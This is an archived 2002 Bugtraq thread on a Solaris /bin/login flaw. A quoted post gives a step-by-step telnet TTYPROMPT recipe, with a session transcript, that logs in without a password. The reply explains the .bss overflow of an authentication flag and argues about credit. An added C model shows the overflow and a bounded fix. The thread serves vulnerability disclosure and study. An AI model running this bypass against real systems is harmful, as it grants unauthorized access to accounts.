RE: Solaris 2.6, 7, 8

From: Sinan Eren (SErenat_private)
Date: Wed Oct 02 2002 - 13:04:27 PDT


    The problem is there exists an authentication flag called the "fflag" just after the array that gets overflowed in the .bss segment. This is an array of char pointers, so when it is overflowed because of a mismanagement in the indexing of this array, the fflag gets overwritten with a valid address in the .bss segment. This is good enough to satisfy the if(fflag) condition and spawn a shell.
    
    Some truth about this finding:
    There has been an exploit out in the wild for some time, and the example pattern shown by Jonathan is exactly the same as the payload of that exploit. So I'm curious about this finding's origin; I think credit must be given where due. I'll be waiting for a clarification from Mr. Stuart.
    
    thanks,
    sinan
    
    -----Original Message-----
    From: Jonathan S [mailto:jsat_private]
    Sent: Wednesday, October 02, 2002 9:13 AM
    To: bugtraqat_private
    Subject: Solaris 2.6, 7, 8
    
    
    Hello,
    
      Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
    environment variable TTYPROMPT.  This vulnerability has already been
    reported to BugTraq and a patch has been released by Sun.
      However, a very simple exploit, which does not require any code to be
    compiled by an attacker, exists.  The exploit requires the attacker to
    simply define the environment variable TTYPROMPT to a 6 character string,
    inside telnet. I believe this overflows an integer inside login, which
    specifies whether or not the user has been authenticated (just a guess).
    Once connected to the remote host, you must type the username, followed by
    64 " c"s, and a literal "\n".  You will then be logged in as the user
    without any password authentication.  This should work with any account
    except root (unless remote root login is allowed).
    
    Example:
    
    coma% telnet
    telnet> environ define TTYPROMPT abcdef
    telnet> o localhost
    
    SunOS 5.8
    
    bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    Last login: whenever
    $ whoami
    bin
    
    Jonathan Stuart
    Network Security Engineer
    Computer Consulting Partners, Ltd.
    E-mail: jonsat_private
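The following is an added model, written for this page and not code from either poster or from Sun's login sources, of the mechanism the reply describes: an array of char pointers in .bss, filled from the tokens of the typed line with no bound on the index, followed directly by the authentication flag. The struct layout, the array size of 64, the tokenizer and the function names are assumptions made so the layout is reproducible; the real login internals are not shown on this page. It also shows why the post needs exactly 64 " c" tokens after the username, and the one-line bound check that stops the overwrite.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAXARGS 64          /* assumed size of the pointer array in this model */

/* Constructed model of login's .bss layout as the reply describes it: an
 * array of char pointers immediately followed by the authentication flag.
 * A struct is used so the adjacency is guaranteed whatever order the linker
 * would give separate globals. This is not Sun's source. */
struct login_state {
    char     *args[MAXARGS];
    uintptr_t fflag;        /* non-zero means "already authenticated" */
};

static struct login_state st;   /* zero-initialised, lives in .bss */
static char linebuf[512];       /* also .bss, so token pointers are .bss addresses */

/* Build the line the post types at the prompt: user, `count` copies of " c",
 * then a newline. */
void build_login_line(char *out, size_t outsz, const char *user, int count)
{
    size_t len = strlen(user);
    if (len + 2 >= outsz) { out[0] = '\0'; return; }
    memcpy(out, user, len);
    for (int i = 0; i < count && len + 3 < outsz; i++) {
        out[len++] = ' ';
        out[len++] = 'c';
    }
    out[len++] = '\n';
    out[len] = '\0';
}

/* Split the line into tokens and store pointer number n at byte offset
 * n*sizeof(char *) from the start of the state block, which is what the
 * compiled store for args[n] does. With bounded == 0 nothing compares n
 * against MAXARGS, so token 65 (n == 64) lands on fflag. Returns the token
 * count, or -1 when the bounded variant rejects the line. */
static int split_line(const char *line, int bounded)
{
    int n = 0;
    memset(&st, 0, sizeof st);
    strncpy(linebuf, line, sizeof linebuf - 1);
    linebuf[sizeof linebuf - 1] = '\0';
    for (char *tok = strtok(linebuf, " \n"); tok; tok = strtok(NULL, " \n")) {
        if (bounded && n >= MAXARGS)
            return -1;                      /* the fix: refuse extra arguments */
        if ((size_t)n * sizeof(char *) + sizeof tok > sizeof st)
            break;                          /* keep the model itself inside st */
        memcpy((char *)&st + n * sizeof(char *), &tok, sizeof tok);
        n++;
    }
    return n;
}

/* fflag after the unbounded parse: non-zero means if (fflag) passes
 * without a password. */
intptr_t fflag_after_vulnerable(const char *line)
{
    split_line(line, 0);
    return (intptr_t)st.fflag;
}

/* fflag after the bounded parse, or -1 if the line was rejected. */
intptr_t fflag_after_fixed(const char *line)
{
    if (split_line(line, 1) < 0)
        return -1;
    return (intptr_t)st.fflag;
}

/* 1 if fflag currently holds an address inside linebuf, i.e. the "valid
 * address in .bss" the reply mentions, else 0. */
int fflag_is_bss_address(void)
{
    uintptr_t lo = (uintptr_t)linebuf, hi = lo + sizeof linebuf;
    return st.fflag >= lo && st.fflag < hi;
}

int main(void)
{
    char line[256];
    build_login_line(line, sizeof line, "bin", 64);   /* 65 tokens: bin + 64 c */
    printf("64 c's, vulnerable: fflag=%#lx bss=%d\n",
           (unsigned long)fflag_after_vulnerable(line), fflag_is_bss_address());
    printf("64 c's, fixed:      result=%ld\n", (long)fflag_after_fixed(line));
    build_login_line(line, sizeof line, "bin", 63);   /* 64 tokens: array exactly full */
    printf("63 c's, vulnerable: fflag=%ld\n", (long)fflag_after_vulnerable(line));
    return 0;
}
```

With 63 " c" tokens the array is exactly full and fflag stays zero; the 64th " c" is the first token whose pointer is stored past the array, which is why the post's recipe uses that count. The bounded variant rejects the line at the 65th token before anything is stored.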
    



    This archive was generated by hypermail 2b30 : Wed Oct 02 2002 - 14:41:19 PDT